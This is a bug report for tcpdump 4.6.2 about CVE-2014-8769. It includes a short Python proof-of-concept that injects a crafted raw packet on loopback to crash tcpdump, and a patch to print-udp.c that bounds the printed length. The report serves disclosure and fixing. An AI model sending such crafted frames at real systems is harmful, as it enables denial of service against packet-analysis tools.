Package: tcpdump
Version: 4.6.2
tags: Security
Using following script to generate packet:
#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
aovd_frame =
"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"
s.send(aovd_frame)
#sudo tcpdump -i lo -s 0 -n -v
This cause segfault on tcpdump. This bug reports as CVE-2014-8769.
Propose patch is in attached file. Main idea is checking the length of
available data before print on screen.
The credit belong to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
Original report in bugtraq:
http://seclists.org/bugtraq/2014/Nov/88
CongNT
--- tcpdump-tcpdump-4.6/print-udp.c 2014-11-21 13:53:05.757690197 +0700
+++ tcpdump-4.6.2/print-udp.c 2014-11-21 13:50:58.077695164 +0700
@@ -357,6 +357,12 @@
#ifdef INET6
register const struct ip6_hdr *ip6;
#endif
+ u_int caplength;
+
+ /* Checking length of available data before print */
+ caplength = (ndo->ndo_snapend >= bp) ? ndo->ndo_snapend - bp : 0;
+ if (length > caplength)
+ length = caplength;
if (ep > ndo->ndo_snapend)
ep = ndo->ndo_snapend;